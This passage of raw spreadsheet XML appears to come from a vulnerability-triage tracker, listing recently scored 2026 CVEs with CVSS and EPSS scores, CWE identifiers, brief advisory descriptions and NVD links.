t="inlineStr"><is><t>Newly scored</t></is></c><c r="C481" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D481" s="5" t="n"><v>8.699999999999999</v></c><c r="E481" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F481" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G481" s="5" t="inlineStr" /><c r="H481" s="5" t="n"><v>0.003</v></c><c r="I481" s="5" t="inlineStr" /><c r="J481" s="5" t="inlineStr" /><c r="K481" s="5" t="inlineStr" /><c r="L481" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M481" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N481" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O481" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P481" s="5" t="inlineStr" /><c r="Q481" s="5" t="inlineStr"><is><t>CWE-1333, CWE-400</t></is></c><c r="R481" s="5" t="inlineStr"><is><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is></c><c r="S481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="482"><c r="A482" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B482" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C482" s="5" t="inlineStr"><is><t>CVE-2026-84190</t></is></c><c r="D482" s="5" t="n"><v>8.699999999999999</v></c><c r="E482" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F482" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G482" s="5" t="inlineStr" /><c r="H482" s="5" t="n"><v>0.006</v></c><c r="I482" s="5" t="inlineStr" /><c r="J482" s="5" t="inlineStr" /><c r="K482" s="5" t="inlineStr" /><c r="L482" s="5" t="inlineStr" /><c r="M482" s="5" t="inlineStr" /><c r="N482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O482" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P482" s="5" t="inlineStr" /><c r="Q482" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R482" s="5" t="inlineStr"><is><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is></c><c r="S482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84190</t></is></c></row><row r="483"><c r="A483" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B483" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C483" s="5" t="inlineStr"><is><t>CVE-2026-84202</t></is></c><c r="D483" s="5" t="n"><v>8.699999999999999</v></c><c r="E483" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F483" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G483" s="5" t="inlineStr" /><c r="H483" s="5" t="n"><v>0.004</v></c><c r="I483" s="5" t="inlineStr" /><c r="J483" s="5" t="inlineStr" /><c r="K483" s="5" t="inlineStr" /><c r="L483" s="5" t="inlineStr" /><c r="M483" s="5" t="inlineStr" /><c r="N483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O483" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P483" s="5" t="inlineStr" /><c r="Q483" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R483" s="5" t="inlineStr"><is><t>ModelScope uses PyYAML's unsafe yaml.Loader to parse model configuration files, allowing arbitrary code execution through Python object construction tags. Attackers can craft malicious model repositories with poisoned configuration files that execute code when loaded by users.</t></is></c><c r="S483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84202</t></is></c></row><row r="484"><c r="A484" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B484" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C484" s="5" t="inlineStr"><is><t>CVE-2026-84208</t></is></c><c r="D484" s="5" t="n"><v>8.699999999999999</v></c><c r="E484" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F484" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G484" s="5" t="inlineStr" /><c r="H484" s="5" t="n"><v>0.003</v></c><c r="I484" s="5" t="inlineStr" /><c r="J484" s="5" t="inlineStr" /><c r="K484" s="5" t="inlineStr" /><c r="L484" s="5" t="inlineStr" /><c r="M484" s="5" t="inlineStr" /><c r="N484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O484" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P484" s="5" t="inlineStr" /><c r="Q484" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R484" s="5" t="inlineStr"><is><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is></c><c r="S484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84208</t></is></c></row><row r="485"><c r="A485" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B485" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C485" s="5" t="inlineStr"><is><t>CVE-2026-84476</t></is></c><c r="D485" s="5" t="n"><v>8.699999999999999</v></c><c r="E485" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F485" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G485" s="5" t="inlineStr" /><c r="H485" s="5" t="n"><v>0.003</v></c><c r="I485" s="5" t="inlineStr" /><c r="J485" s="5" t="inlineStr" /><c r="K485" s="5" t="inlineStr" /><c r="L485" s="5" t="inlineStr" /><c r="M485" s="5" t="inlineStr" /><c r="N485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O485" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P485" s="5" t="inlineStr" /><c r="Q485" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="R485" s="5" t="inlineStr"><is><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is></c><c r="S485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84476</t></is></c></row><row r="486"><c r="A486" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B486" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C486" s="5" t="inlineStr"><is><t>CVE-2026-84482</t></is></c><c r="D486" s="5" t="n"><v>8.699999999999999</v></c><c r="E486" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F486" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G486" s="5" t="inlineStr" /><c r="H486" s="5" t="n"><v>0.001</v></c><c r="I486" s="5" t="inlineStr" /><c r="J486" s="5" t="inlineStr" /><c r="K486" s="5" t="inlineStr" /><c r="L486" s="5" t="inlineStr" /><c r="M486" s="5" t="inlineStr" /><c r="N486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O486" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P486" s="5" t="inlineStr" /><c r="Q486" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="R486" s="5" t="inlineStr"><is><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is></c><c r="S486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84482</t></is></c></row><row r="487"><c r="A487" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B487" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C487" s="5" t="inlineStr"><is><t>CVE-2026-85147</t></is></c><c r="D487" s="5" t="n"><v>8.699999999999999</v></c><c r="E487" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F487" s="5" t="inlineStr"><is><t>twcert@cert.org.tw</t></is></c><c r="G487" s="5" t="inlineStr" /><c r="H487" s="5" t="n"><v>0.002</v></c><c r="I487" s="5" t="inlineStr" /><c r="J487" s="5" t="inlineStr" /><c r="K487" s="5" t="inlineStr" /><c r="L487" s="5" t="inlineStr" /><c r="M487" s="5" t="inlineStr" /><c r="N487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O487" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P487" s="5" t="inlineStr" /><c r="Q487" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R487" s="5" t="inlineStr"><is><t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain a specific password from the source code, which can be used to retrieve the AES encryption key used for communication.</t></is></c><c r="S487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85147</t></is></c></row><row r="488"><c r="A488" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B488" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C488" s="5" t="inlineStr"><is><t>CVE-2026-85169</t></is></c><c r="D488" s="5" t="n"><v>8.699999999999999</v></c><c r="E488" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F488" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G488" s="5" t="inlineStr" /><c r="H488" s="5" t="n"><v>0.004</v></c><c r="I488" s="5" t="inlineStr" /><c r="J488" s="5" t="inlineStr" /><c r="K488" s="5" t="inlineStr" /><c r="L488" s="5" t="inlineStr" /><c r="M488" s="5" t="inlineStr" /><c r="N488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O488" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P488" s="5" t="inlineStr" /><c r="Q488" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R488" s="5" t="inlineStr"><is><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is></c><c r="S488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85169</t></is></c></row><row r="489"><c r="A489" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B489" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C489" s="5" t="inlineStr"><is><t>CVE-2026-85174</t></is></c><c r="D489" s="5" t="n"><v>8.699999999999999</v></c><c r="E489" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F489" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G489" s="5" t="inlineStr" /><c r="H489" s="5" t="n"><v>0.003</v></c><c r="I489" s="5" t="inlineStr" /><c r="J489" s="5" t="inlineStr" /><c r="K489" s="5" t="inlineStr" /><c r="L489" s="5" t="inlineStr" /><c r="M489" s="5" t="inlineStr" /><c r="N489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O489" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P489" s="5" t="inlineStr" /><c r="Q489" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R489" s="5" t="inlineStr"><is><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is></c><c r="S489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85174</t></is></c></row><row r="490"><c r="A490" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B490" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C490" s="5" t="inlineStr"><is><t>CVE-2026-85429</t></is></c><c r="D490" s="5" t="n"><v>8.699999999999999</v></c><c r="E490" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F490" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G490" s="5" t="inlineStr" /><c r="H490" s="5" t="n"><v>0.002</v></c><c r="I490" s="5" t="inlineStr" /><c r="J490" s="5" t="inlineStr" /><c r="K490" s="5" t="inlineStr" /><c r="L490" s="5" t="inlineStr" /><c r="M490" s="5" t="inlineStr" /><c r="N490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O490" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P490" s="5" t="inlineStr" /><c r="Q490" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R490" s="5" t="inlineStr"><is><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is></c><c r="S490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85429</t></is></c></row><row r="491"><c r="A491" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B491" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C491" s="5" t="inlineStr"><is><t>CVE-2026-85431</t></is></c><c r="D491" s="5" t="n"><v>8.699999999999999</v></c><c r="E491" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F491" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G491" s="5" t="inlineStr" /><c r="H491" s="5" t="n"><v>0.019</v></c><c r="I491" s="5" t="inlineStr" /><c r="J491" s="5" t="inlineStr" /><c r="K491" s="5" t="inlineStr" /><c r="L491" s="5" t="inlineStr" /><c r="M491" s="5" t="inlineStr" /><c r="N491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O491" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P491" s="5" t="inlineStr" /><c r="Q491" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R491" s="5" t="inlineStr"><is><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is></c><c r="S491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85431</t></is></c></row><row r="492"><c r="A492" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B492" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C492" s="5" t="inlineStr"><is><t>CVE-2026-85436</t></is></c><c r="D492" s="5" t="n"><v>8.699999999999999</v></c><c r="E492" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F492" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G492" s="5" t="inlineStr" /><c r="H492" s="5" t="n"><v>0.012</v></c><c r="I492" s="5" t="inlineStr" /><c r="J492" s="5" t="inlineStr" /><c r="K492" s="5" t="inlineStr" /><c r="L492" s="5" t="inlineStr" /><c r="M492" s="5" t="inlineStr" /><c r="N492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O492" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P492" s="5" t="inlineStr" /><c r="Q492" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R492" s="5" t="inlineStr"><is><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is></c><c r="S492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85436</t></is></c></row><row r="493"><c r="A493" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B493" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C493" s="5" t="inlineStr"><is><t>CVE-2026-85441</t></is></c><c r="D493" s="5" t="n"><v>8.699999999999999</v></c><c r="E493" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F493" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G493" s="5" t="inlineStr" /><c r="H493" s="5" t="n"><v>0.004</v></c><c r="I493" s="5" t="inlineStr" /><c r="J493" s="5" t="inlineStr" /><c r="K493" s="5" t="inlineStr" /><c r="L493" s="5" t="inlineStr" /><c r="M493" s="5" t="inlineStr" /><c r="N493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O493" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P493" s="5" t="inlineStr" /><c r="Q493" s="5" t="inlineStr"><is><t>CWE-195</t></is></c><c r="R493" s="5" t="inlineStr"><is><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is></c><c r="S493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85441</t></is></c></row><row r="494"><c r="A494" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B494" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C494" s="5" t="inlineStr"><is><t>CVE-2026-85442</t></is></c><c r="D494" s="5" t="n"><v>8.699999999999999</v></c><c r="E494" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F494" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G494" s="5" t="inlineStr" /><c r="H494" s="5" t="n"><v>0.004</v></c><c r="I494" s="5" t="inlineStr" /><c r="J494" s="5" t="inlineStr" /><c r="K494" s="5" t="inlineStr" /><c r="L494" s="5" t="inlineStr" /><c r="M494" s="5" t="inlineStr" /><c r="N494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O494" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P494" s="5" t="inlineStr" /><c r="Q494" s="5" t="inlineStr"><is><t>CWE-789</t></is></c><c r="R494" s="5" t="inlineStr"><is><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is></c><c r="S494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85442</t></is></c></row><row r="495"><c r="A495" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B495" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C495" s="5" t="inlineStr"><is><t>CVE-2026-85444</t></is></c><c r="D495" s="5" t="n"><v>8.699999999999999</v></c><c r="E495" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F495" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G495" s="5" t="inlineStr" /><c r="H495" s="5" t="n"><v>0.004</v></c><c r="I495" s="5" t="inlineStr" /><c r="J495" s="5" t="inlineStr" /><c r="K495" s="5" t="inlineStr" /><c r="L495" s="5" t="inlineStr" /><c r="M495" s="5" t="inlineStr" /><c r="N495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O495" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P495" s="5" t="inlineStr" /><c r="Q495" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R495" s="5" t="inlineStr"><is><t>MOOS-IvP t</t></is></c><c r="S495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85444</t></is></c></row><row r="496"><c r="A496" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B496" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C496" s="5" t="inlineStr"><is><t>CVE-2026-85445</t></is></c><c r="D496" s="5" t="n"><v>8.699999999999999</v></c><c r="E496" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F496" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G496" s="5" t="inlineStr" /><c r="H496" s="5" t="n"><v>0.004</v></c><c r="I496" s="5" t="inlineStr" /><c r="J496" s="5" t="inlineStr" /><c r="K496" s="5" t="inlineStr" /><c r="L496" s="5" t="inlineStr" /><c r="M496" s="5" t="inlineStr" /><c r="N496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O496" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P496" s="5" t="inlineStr" /><c r="Q496" s="5" t="inlineStr"><is><t>CWE-789</t></is></c><c r="R496" s="5" t="inlineStr"><is><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is></c><c r="S496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85445</t></is></c></row><row r="497"><c r="A497" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B497" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C497" s="5" t="inlineStr"><is><t>CVE-2026-85446</t></is></c><c r="D497" s="5" t="n"><v>8.699999999999999</v></c><c r="E497" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F497" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G497" s="5" t="inlineStr" /><c r="H497" s="5" t="n"><v>0.004</v></c><c r="I497" s="5" t="inlineStr" /><c r="J497" s="5" t="inlineStr" /><c r="K497" s="5" t="inlineStr" /><c r="L497" s="5" t="inlineStr" /><c r="M497" s="5" t="inlineStr" /><c r="N497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O497" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P497" s="5" t="inlineStr" /><c r="Q497" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R497" s="5" t="inlineStr"><is><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is></c><c r="S497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85446</t></is></c></row><row r="498"><c r="A498" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B498" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C498" s="5" t="inlineStr"><is><t>CVE-2026-85447</t></is></c><c r="D498" s="5" t="n"><v>8.699999999999999</v></c><c r="E498" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F498" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G498" s="5" t="inlineStr" /><c r="H498" s="5" t="n"><v>0.004</v></c><c r="I498" s="5" t="inlineStr" /><c r="J498" s="5" t="inlineStr" /><c r="K498" s="5" t="inlineStr" /><c r="L498" s="5" t="inlineStr" /><c r="M498" s="5" t="inlineStr" /><c r="N498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O498" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P498" s="5" t="inlineStr" /><c r="Q498" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R498" s="5" t="inlineStr"><is><t>MOOS-IvP p</t></is></c><c r="S498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85447</t></is></c></row><row r="499"><c r="A499" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B499" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C499" s="5" t="inlineStr"><is><t>CVE-2026-85449</t></is></c><c r="D499" s="5" t="n"><v>8.699999999999999</v></c><c r="E499" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F499" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G499" s="5" t="inlineStr" /><c r="H499" s="5" t="n"><v>0.004</v></c><c r="I499" s="5" t="inlineStr" /><c r="J499" s="5" t="inlineStr" /><c r="K499" s="5" t="inlineStr" /><c r="L499" s="5" t="inlineStr" /><c r="M499" s="5" t="inlineStr" /><c r="N499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O499" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P499" s="5" t="inlineStr" /><c r="Q499" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R499" s="5" t="inlineStr"><is><t>MOOS-IvP p</t></is></c><c r="S499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85449</t></is></c></row><row r="500"><c r="A500" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B500" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C500" s="5" t="inlineStr"><is><t>CVE-2026-85450</t></is></c><c r="D500" s="5" t="n"><v>8.699999999999999</v></c><c r="E500" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F500" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G500" s="5" t="inlineStr" /><c r="H500" s="5" t="n"><v>0.004</v></c><c r="I500" s="5" t="inlineStr" /><c r="J500" s="5" t="inlineStr" /><c r="K500" s="5" t="inlineStr" /><c r="L500" s="5" t="inlineStr" /><c r="M500" s="5" t="inlineStr" /><c r="N500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O500" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P500" s="5" t="inlineStr" /><c r="Q500" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R500" s="5" t="inlineStr"><is><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is></c><c r="S500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85450</t></is></c></row><row r="501"><c r="A501" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B501" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C501" s="5" t="inlineStr"><is><t>CVE-2026-85452</t></is></c><c r="D501" s="5" t="n"><v>8.699999999999999</v></c><c r="E501" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F501" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G501" s="5" t="inlineStr" /><c r="H501" s="5" t="n"><v>0.004</v></c><c r="I501" s="5" t="inlineStr" /><c r="J501" s="5" t="inlineStr" /><c r="K501" s="5" t="inlineStr" /><c r="L501" s="5" t="inlineStr" /><c r="M501" s="5" t="inlineStr" /><c r="N501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O501" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P501" s="5" t="inlineStr" /><c r="Q501" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R501" s="5" t="inlineStr"><is><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is></c><c r="S501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85452</t></is></c></row><row r="502"><c r="A502" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B502" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C502" s="5" t="inlineStr"><is><t>CVE-2026-85540</t></is></c><c r="D502" s="5" t="n"><v>8.699999999999999</v></c><c r="E502" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F502" s="5" t="inlineStr"><is><t>twcert@cert.org.tw</t></is></c><c r="G502" s="5" t="inlineStr" /><c r="H502" s="5" t="n"><v>0.003</v></c><c r="I502" s="5" t="inlineStr" /><c r="J502" s="5" t="inlineStr" /><c r="K502" s="5" t="inlineStr" /><c r="L502" s="5" t="inlineStr" /><c r="M502" s="5" t="inlineStr" /><c r="N502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O502" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P502" s="5" t="inlineStr" /><c r="Q502" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R502" s="5" t="inlineStr"><is><t>DreamMaker developed by Interinfo has a SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read, modify, and delete database contents.</t></is></c><c r="S502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85540</t></is></c></row><row r="503"><c r="A503" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B503" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C503" s="5" t="inlineStr"><is><t>CVE-2026-85584</t></is></c><c r="D503" s="5" t="n"><v>8.699999999999999</v></c><c r="E503" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F503" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G503" s="5" t="inlineStr" /><c r="H503" s="5" t="n"><v>0.003</v></c><c r="I503" s="5" t="inlineStr" /><c r="J503" s="5" t="inlineStr" /><c r="K503" s="5" t="inlineStr" /><c r="L503" s="5" t="inlineStr" /><c r="M503" s="5" t="inlineStr" /><c r="N503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O503" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P503" s="5" t="inlineStr" /><c r="Q503" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R503" s="5" t="inlineStr"><is><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is></c><c r="S503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85584</t></is></c></row><row r="504"><c r="A504" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B504" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C504" s="5" t="inlineStr"><is><t>CVE-2026-85585</t></is></c><c r="D504" s="5" t="n"><v>8.699999999999999</v></c><c r="E504" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F504" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G504" s="5" t="inlineStr" /><c r="H504" s="5" t="n"><v>0.004</v></c><c r="I504" s="5" t="inlineStr" /><c r="J504" s="5" t="inlineStr" /><c r="K504" s="5" t="inlineStr" /><c r="L504" s="5" t="inlineStr" /><c r="M504" s="5" t="inlineStr" /><c r="N504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O504" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P504" s="5" t="inlineStr" /><c r="Q504" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R504" s="5" t="inlineStr"><is><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is></c><c r="S504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85585</t></is></c></row><row r="505"><c r="A505" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B505" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C505" s="5" t="inlineStr"><is><t>CVE-2026-85604</t></is></c><c r="D505" s="5" t="n"><v>8.699999999999999</v></c><c r="E505" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F505" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G505" s="5" t="inlineStr" /><c r="H505" s="5" t="n"><v>0.005</v></c><c r="I505" s="5" t="inlineStr" /><c r="J505" s="5" t="inlineStr" /><c r="K505" s="5" t="inlineStr" /><c r="L505" s="5" t="inlineStr" /><c r="M505" s="5" t="inlineStr" /><c r="N505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O505" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P505" s="5" t="inlineStr" /><c r="Q505" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R505" s="5" t="inlineStr"><is><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is></c><c r="S505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85604</t></is></c></row><row r="506"><c r="A506" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B506" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C506" s="5" t="inlineStr"><is><t>CVE-2026-85626</t></is></c><c r="D506" s="5" t="n"><v>8.699999999999999</v></c><c r="E506" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F506" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G506" s="5" t="inlineStr" /><c r="H506" s="5" 